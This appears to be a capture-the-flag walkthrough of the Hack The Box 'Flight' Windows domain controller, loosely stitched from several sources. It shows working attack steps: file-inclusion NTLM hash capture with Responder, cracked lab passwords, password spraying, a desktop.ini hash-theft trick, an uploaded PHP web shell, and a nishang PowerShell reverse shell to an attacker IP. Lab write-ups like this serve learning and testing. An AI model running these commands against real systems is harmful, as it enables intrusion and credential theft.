โœˆ๏ธFlight

rustscan --addresses 10.10.11.187 --ulimit 5000 -- -A -sC -Pn -sV -T 1500

nmap -p- 10.10.11.187 --min-rate 5000

nmap -p 53,80,88,135,139,389,445,464,593,636,3268,3269,9389 -sC -sV -oN nmapscan 10.10.11.187 -T5

UDP nmap port scanning

nmap -T4 -n -Pn -sU --top-ports=50 flight.htb -oA udp-top-50

nmap -p- --min-rate 10000 10.10.11.187

nmap -sCV -p 53,80,88,135,139,389,445,464,593,636,5985,9389 10.10.11.187

This looks like a Windows DC with the domain name flight.htb, and a hostname of G0.

Lots of ports to potentially look at. Iโ€™ll prioritize SMB and Web, and check in with LDAP, Kerberos, and DNS if I donโ€™t find what I need from them.

DNS Enumeration

query all dns records and perform a dns zone transfer

dig axfr flight.htb @10.10.11.187

Letโ€™s query all the dns records

dig any flight.htb @10.10.11.187

Web server Enumeration

Letโ€™s start by taking a quick look at the different features of the website

static page and it will not be useful. Letโ€™s keep on our enumeration

Web technologies profiling

whatweb -a 3 flight.htb

The website is running on Apache webserver and is using PHP. After some research, I found no interesting vulnerabilities that affected those technologies.

Web crawling

web crawler called ReconSpider to get more information about any link, email address, form or comments that could help me move forward

Directory fuzzing

https://www.thehacker.recipes/web/recon/directory-fuzzing

Fuzzing tools

gobuster dir --useragent "PENTEST" --wordlist "/path/to/wordlist.txt" --url $URL

wfuzz --hc 404,403 -H "User-Agent: PENTEST" -c -z file,"/path/to/wordlist.txt" $URL/FUZZ

ffuf -H "User-Agent: PENTEST" -c -w "/path/to/wordlist.txt" -maxtime-job 60 -recursion -recursion-depth 2 -u $URL/FUZZ

feroxbuster -H "User-Agent: PENTEST" -w "/path/to/wordlist.txt" -u http://192.168.10.10/

feroxbuster -H "User-Agent: PENTEST" -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://10.10.11.187/

feroxbuster -H "User-Agent: PENTEST" -w <(printf '%s\n' /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt) -u http://10.10.11.187/

Virtual hosts fuzzing

Subdomain Fuzz

wfuzz -u http://10.10.11.187 -H "Host: FUZZ.flight.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hh 7069

What your command does

wfuzz -u http://10.10.11.187 -H "Host: FUZZ.flight.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hh 7069

  • -u http://10.10.11.187 Sends requests to the web server at 10.10.11.187 (target IP).

  • -H "Host: FUZZ.flight.htb" Replaces FUZZ with each word from the wordlist in the Host: header โ€” so youโ€™re testing subdomain.flight.htb values while connecting to the IP directly (common technique for virtual-hosted sites).

  • -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt Wordlist of candidate subdomain names used to replace FUZZ.

  • --hh 7069 Hides responses whose size (in characters) equals 7069. This is used to filter out the common โ€œnot foundโ€ / default page the server returns so obvious noise isnโ€™t shown. You can also base filters off a baseline response. wfuzz.readthedocs.io

Why --hh is useful here

Web servers often return a default page (soft 404) with the same size for "missing" subdomains. By hiding that character-length you reduce noise and surface only responses that differ (potentially valid subdomains). The docs show this exact technique (using --hh or a baseline).

Suggested improvements / practical tips

  • add color + more threads + save output:

    wfuzz -c -t 50 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
      -H "Host: FUZZ.flight.htb" -u http://10.10.11.187 --hh 7069 -o results.txt

    -c = colored output, -t 50 = 50 threads, -o = output file.

  • combine filters: if you know the server returns 404 status too, hide it with --hc 404 and --hh 7069 together to be stricter.

  • use a baseline request to auto-capture the default response and then refer to it (docs show how to use a baseline token like BBB to build filters automatically). wfuzz.readthedocs.io

  • try smaller, focused wordlists first (top 5k is fine) โ€” then expand if needed.

  • if you want DNS-level confirmation (to avoid relying on Host header responses), run DNS brute force / massdns / dig against flight.htb names (but only in-scope / authorized targets).

  • if you see 302/301 redirects with 0-length bodies, follow up manually (they may be interesting endpoints).

Iโ€™ll add both to my /etc/hosts file along with the host name:

10.10.11.187 flight.htb school.flight.htb g0.flight.htb

SMB - TCP 445

crackmapexec confirms the domain and host name

crackmapexec smb 10.10.11.187

It isnโ€™t able to get any information about shares

crackmapexec smb 10.10.11.187 --shares

crackmapexec smb 10.10.11.187 --shares -u 0xdf -p ''

flight.htb - TCP 80

Most the links are dead or just lead back to this page.

Tech Stack

The โ€œAIRLINES International Travelโ€ link leads to index.html, which suggests this is a static site.

The response headers donโ€™t give much additional information either, other than confirming what nmap also found - the web server is Apache:

curl -s -D - -o /dev/null -H "Host: flight.htb" http://10.10.11.187

HTTP/1.1 200 OK
Date: Fri, 28 Oct 2022 17:35:08 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
Last-Modified: Thu, 24 Feb 2022 05:58:10 GMT
ETag: "1b9d-5d8bd444f0080"
Accept-Ranges: bytes
Content-Length: 7069
Connection: close
Content-Type: text/html

Thereโ€™s also a PHP version in that server header, which suggests PHP is enabled.

Directory Brute Force

Iโ€™ll run feroxbuster against the site, and include -x html,php since I know the site is using .html extensions and potentially PHP

feroxbuster -u http://flight.htb -x html,php

/phpmyadmin is on the box, but returns a forbidden-on visiting

con, aux, and prn all return 403 for .php, but also these return the same for /con and /con.html. It seems more like an Apache rule match than an actual page

school.flight.htb - The site is for an aviation school

The site is all placeholder text and a few page links, but nothing interesting.

The main page is index.php. In fact, the other pages that have content have URLs of the form http://school.flight.htb/index.php?view=about.html.

Itโ€™s a very common PHP structure where different pages on a site all use index.php that defines the header and footer and menus, and then some parameter specifying what page to include as the body. These are often vulnerable to path traversal (reading outside the current directory) and local file include (including PHP code that is executed) vulnerabilities.

Directory Brute Force

feroxbuster -u http://school.flight.htb -x html,php

As you can see, the view parameter seems to display the content of a page.

When seeing such things, I generally think of directory path transversal and file inclusions (LFI, RFI) attacks.

Directory path transversal

On a Linux box, Iโ€™d try to read /etc/passwd. Since this is Windows, Iโ€™ll try C:\windows\system32\drivers\etc\hosts, but it returns an error:

http://school.flight.htb/index.php?view=blog.html

http://school.flight.htb/index.php?view=.../.../.../.../.../.../.../.../.../windows/system32/drivers/etc/hosts

It seems that there are some sort of filtering put in place by the server. Letโ€™s see if this was implemented on the server or client side ?

When replacing blog.html with index.php in the view parameter, I came across this

In fact, just having just view=\ results in the same blocked response. view=. returns nothing, but anything with .. in it also results in the blocked message.

I can try with / instead of \, make sure to use an absolute path, and it works:

http://school.flight.htb/index.php?view=c:/windows/system32/drivers/etc/hosts

Remote File Inclusion

If we think a little bit outside the box, we must find another solution that might work pretty well here. From previous enumeration, we already know that we have a Windows host with SMB running on it. What if we tell the web server to connect to a share on our machine ? Well, if everything goes fine, it should normally try to authenticate to our SMB server and we must be able to capture its Net-NTLMv2 hash and then crack it.

Lets try setting up a Responder listener and seeing if the page will call back

responder -I tun0

http://school.flight.htb/index.php?view=//10.10.16.4/gggg

find the hash -

save i tin a file and crack the hash

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

S@Ss!K@*t13

crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13'

crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --shares

Before moving on from CME, lets use the --rid-brute to enumerate users:

crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --rid-brute | grep SidTypeUser

weโ€™ve found several. Let's add them to a file called users.txt

simple redirect

nxc ldap 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' --users > users1.txt

or see output and save at the same time

nxc ldap 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' --users | tee users1.txt

try spraying the password we have against our users list

crackmapexec smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success

S.Moon is using the same password as svc_apache.

Unfortunately, we still donโ€™t have local auth privileges on the target, but what is interesting is we now have both read and write access to the Shared SMB share, whereas svc_apache only had read permissions.

S.Moon uses that same password!

Auth as C.Bum

SMB

In addition to the read access, S.Moon has write access to Shared

crackmapexec smb flight.htb -u S.Moon -p 'S@Ss!K@*t13' --shares

Will check any of the shares will be writable or not using the below command. If its writable we cab upload malicious payload

impacket-psexec flight/svc_apache:'S@Ss!K@*t13'@10.10.11.187

impacket-psexec flight/S.Moon:'S@Ss!K@*t13'@10.10.11.187

https://gitlab.com/pentest-tools/PayloadsAllTheThings/-/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#scf-and-url-file-attack-against-writeable-share

https://arttoolkit.github.io/wadcoms/NTLM-stealing_creds-desktop/

create desktop.ini

Start responder

responder -wv -I tun0

Now i will access the desktop.ini file via share

smbclient \\10.10.11.187\Shared -U s.moon

now we can check the responder

now we will crack the hash

john --wordlist=/usr/share/wordlists/rockyou.txt hashcbum

Tikkycoll_431012284 (c.bum)

hashcat -m 5600 hashcbum /usr/share/wordlists/rockyou.txt

Now we will try to access shares

smbclient -L \\10.10.11.187\\ -U c.bum

impacket-psexec flight/c.bum:'Tikkycoll_431012284'@10.10.11.187

crackmapexec smb flight.htb -u c.bum -p 'Tikkycoll_431012284' --shares

Now try to access the web share

smbclient \\10.10.11.187\web -U c.bum

This application is running on php we can create php reverse shell and upload it.so that we will test

Create test file

now we will upload the file

Now we will create the revshell

https://www.revshells.com/

now upload the revshell hello.php

now acces the file in web - http://flight.htb/hello.php?cmd=whoami

We will try get reverse shell using nishang shell

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.4 -Port 7575 - paste this last in the file kali ip and port

start the listener and start the python web server

python -m http.server 8080

nc -nvlp 7575

type the command in execution box and click execute

Pwned C.Bum

WinRM is unfortunately not enabled for this box. However, we can access the userโ€™s working directory using the Users share. Letโ€™s retrieve the user.txt flag

Summary

The hidden IIS instance on port 8000 ran with a writable web root by c.bum. Uploading an ASPX shell delivered an internal Meterpreter session.

Details

I noticed a inetpub folder in the root of the C drive, which is odd because from the nmap scan we know that Apache is running, not IIS.

Taking a further look into it, I can see the port 8000 is listening, but it also doesnโ€™t show on the nmpa scan. Probably being blacklisted on the firewall:

netstat -a -p tcp

investigated the inners of inetpub more thoroughly and discovered that c.bum has write access in the โ€œdevelopmentโ€ folder:

Intrusion

Credential stuffing

As we look at the URL, it could be that this website suffers from a Local File Intrusion (LFI) or a Remote File Inclusion (RFI). We can try some parameters. Well, it seems that there is some protection in place.

Last updated

Was this helpful?